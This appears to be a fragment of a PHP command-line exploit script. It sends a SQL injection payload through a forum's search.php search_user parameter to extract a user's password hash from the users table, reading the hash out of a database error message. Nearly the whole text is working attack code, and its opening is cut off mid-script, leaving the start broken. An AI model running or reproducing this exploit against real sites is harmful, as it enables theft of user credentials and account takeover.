#!/usr/bin/php ", $page)){ die("Failed.."); }else{ die("Table Prefix: $tab\n"); } } } if($argv[4]){ $pipe = fsockopen($argv[1],80); if(!$pipe){ die("Cannot connect to host."); } else { $sql = "x%27%20union%20select%20user_password%20from%20"."$argv[3]"."users%20where%20user_id%3D%27$argv[4]"; $sql = urlencode($sql); $req = "GET $argv[2]"."search.php?search_user="."$sql HTTP/1.1\r\n"; $req .= "Host: $argv[1]\r\n"; $req .= "Connection: Close\r\n\r\n"; fwrite($pipe , $req); while(!feof($pipe)) { $data .= fgets($pipe); } $gdata = explode("Unknown column '",$data); $ghash = explode("' in 'where clause'",$gdata[1]); $hash = $ghash[0]; if(strlen($hash) != 32){ die("Exploit failed..\n"); }else{ echo "Outputted Hash: $hash\n"; } } } ?>